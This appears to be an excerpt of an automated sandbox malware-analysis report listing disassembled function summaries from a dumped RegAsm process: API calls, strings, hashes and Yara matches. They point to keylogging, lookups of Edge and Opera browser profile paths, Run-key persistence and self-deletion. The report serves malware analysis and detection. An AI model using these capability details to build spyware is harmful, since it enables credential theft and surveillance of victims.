                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExistsFilePath
                                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                  • API String ID: 1174141254-2800177040
                                                                  • Opcode ID: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                                                  • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                                  • Opcode Fuzzy Hash: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                                                  • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                                  APIs
                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExistsFilePath
                                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                                  • API String ID: 1174141254-1629609700
                                                                  • Opcode ID: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                                                  • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                                  • Opcode Fuzzy Hash: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                                                  • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                                  APIs
                                                                  • GetKeyState.USER32(00000011), ref: 0040B64B
                                                                    • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                                                    • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                    • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                                                                    • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                                    • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                                                    • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                                                                    • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                                                                    • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                  • String ID: [AltL]$[AltR]
                                                                  • API String ID: 2738857842-2658077756
                                                                  • Opcode ID: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
                                                                  • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                                  • Opcode Fuzzy Hash: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
                                                                  • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                                  APIs
                                                                  • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                  • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: uD
                                                                  • API String ID: 0-2547262877
                                                                  • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                  • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                                                  • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                  • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                                                  APIs
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExecuteShell
                                                                  • String ID: !D@$open
                                                                  • API String ID: 587946157-1586967515
                                                                  • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                                                  • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                                  • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                                                  • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                                  APIs
                                                                  • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: State
                                                                  • String ID: [CtrlL]$[CtrlR]
                                                                  • API String ID: 1649606143-2446555240
                                                                  • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                                  • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                                  • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                                  • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                                  APIs
                                                                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                  • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer__onexit
                                                                  • String ID: ,kG$0kG
                                                                  • API String ID: 1881088180-2015055088
                                                                  • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                                                  • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                                  • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                                                  • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                                  APIs
                                                                  Strings
                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteOpenValue
                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                  • API String ID: 2654517830-1051519024
                                                                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                  • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                                                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                  • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                                                  APIs
                                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteDirectoryFileRemove
                                                                  • String ID: pth_unenc
                                                                  • API String ID: 3325800564-4028850238
                                                                  • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                                  • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                                                  • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                                  • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                                                  APIs
                                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ObjectProcessSingleTerminateWait
                                                                  • String ID: pth_unenc
                                                                  • API String ID: 1872346434-4028850238
                                                                  • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                  • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                                                  • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                  • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                                                  • GetLastError.KERNEL32 ref: 00440D35
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1717984340-0
                                                                  • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                                  • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                                                  • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                                  • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                                                  APIs
                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411B8C
                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C58
                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                                                  • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastRead
                                                                  • String ID:
                                                                  • API String ID: 4100373531-0
                                                                  • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                  • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                                                  • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                  • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99